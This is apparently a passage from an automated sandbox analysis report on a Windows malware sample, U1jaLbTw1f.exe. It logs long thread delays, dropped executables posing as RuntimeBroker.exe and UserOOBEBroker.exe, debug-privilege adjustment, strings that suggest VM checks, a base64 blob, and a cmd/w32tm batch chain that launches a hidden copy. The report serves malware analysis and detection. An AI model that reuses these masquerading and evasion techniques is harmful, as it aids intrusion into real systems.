                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 598468
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 598312
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 598203
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 598040
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 597906
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 597781
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 597578
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 597468
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 597342
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 597218
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 597109
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 596998
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 596880
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 300000
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 596750
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 596640
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 596531
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 596421
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 596312
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 596187
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 596067
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 595937
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 595828
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 595718
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 595609
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 595499
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 595390
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 595281
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 595171
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 595060
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 594821
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 594716
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 594609
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 594497
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 594353
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 594244
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 594130
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 594009
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 593906
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 593796
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 593675
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 593559
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 593452
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 593295
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 593186
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 593077
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWindow / User API: threadDelayed 6438
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWindow / User API: threadDelayed 3293
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\oGlGPwkc.logJump to dropped file
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\YEfCwsuO.logJump to dropped file
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\wJkgsuUR.logJump to dropped file
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeDropped PE file which has not been started: C:\Users\user\Desktop\cDNiSsHV.logJump to dropped file
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeDropped PE file which has not been started: C:\Users\user\Desktop\mmgyBVMD.logJump to dropped file
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeDropped PE file which has not been started: C:\Users\user\Desktop\bGmawssa.logJump to dropped file
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeDropped PE file which has not been started: C:\Users\user\Desktop\wVAOlxRk.logJump to dropped file
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\tbIFYUNW.logJump to dropped file
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exe TID: 7608Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe TID: 7268Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe TID: 2476Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 3848Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 8132Thread sleep time: -30000s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -29514790517935264s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -600000s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -599862s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 3168Thread sleep time: -21600000s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -598921s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -598468s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -598312s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -598203s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -598040s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -597906s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -597781s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -597578s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -597468s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -597342s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -597218s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -597109s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -596998s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -596880s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 3168Thread sleep time: -300000s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -596750s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -596640s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -596531s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -596421s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -596312s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -596187s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -596067s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -595937s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -595828s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -595718s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -595609s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -595499s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -595390s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -595281s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -595171s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -595060s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -594821s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -594716s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -594609s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -594497s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -594353s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -594244s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -594130s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -594009s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -593906s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -593796s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -593675s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -593559s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -593452s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -593295s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -593186s >= -30000s
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exe TID: 736Thread sleep time: -593077s >= -30000s
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exe TID: 7380Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exe TID: 4632Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exe TID: 1260Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exe TID: 3844Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe TID: 2424Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 22_2_00007FFD9B7C9321 GetSystemInfo,22_2_00007FFD9B7C9321
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 30000
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 600000
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 599862
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 3600000
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 598921
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 598468
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 598312
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 598203
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 598040
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 597906
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 597781
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 597578
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 597468
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 597342
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 597218
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 597109
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 596998
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 596880
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 300000
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 596750
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 596640
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 596531
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 596421
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 596312
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 596187
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 596067
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 595937
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 595828
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 595718
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 595609
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 595499
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 595390
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 595281
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 595171
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 595060
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 594821
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 594716
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 594609
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 594497
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 594353
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 594244
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 594130
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 594009
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 593906
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 593796
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 593675
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 593559
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 593452
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 593295
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 593186
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeThread delayed: delay time: 593077
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: U1jaLbTw1f.exe, 00000000.00000002.1690547931.000000001C471000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_
                              Source: RuntimeBroker.exe, 00000016.00000002.4157256163.0000000012DA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
                              Source: RuntimeBroker.exe, 00000016.00000002.4172710678.000000001BA3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll U
                              Source: U1jaLbTw1f.exe, UserOOBEBroker.exe.0.dr, RuntimeBroker.exe0.0.dr, RuntimeBroker.exe.0.dr, RuntimeBroker.exe1.0.dr, mGDcgYSpPaqkzVyIrStmzarQirIs.exe.0.drBinary or memory string: RMqkqemUuiKkl0dOtBV
                              Source: mGDcgYSpPaqkzVyIrStmzarQirIs.exe.0.drBinary or memory string: Q4B1DqVDVXmAyxvmCi5C
                              Source: w32tm.exe, 0000001B.00000002.1733299918.000001B82AB39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
                              Source: U1jaLbTw1f.exe, 00000000.00000002.1690615302.000000001C4BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess token adjusted: Debug
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess token adjusted: Debug
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess token adjusted: Debug
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeMemory allocated: page read and write | page guardJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\WGIlBCoJLj.bat" Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe "C:\Program Files (x86)\jdownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe"
                              Source: RuntimeBroker.exe, 00000016.00000002.4116310590.0000000002FB7000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000016.00000002.4116310590.00000000030C4000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000016.00000002.4116310590.0000000003295000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeQueries volume information: C:\Users\user\Desktop\U1jaLbTw1f.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeQueries volume information: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeQueries volume information: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe VolumeInformationJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Program Files\Windows Security\RuntimeBroker.exe VolumeInformationJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Program Files\Windows Security\RuntimeBroker.exe VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
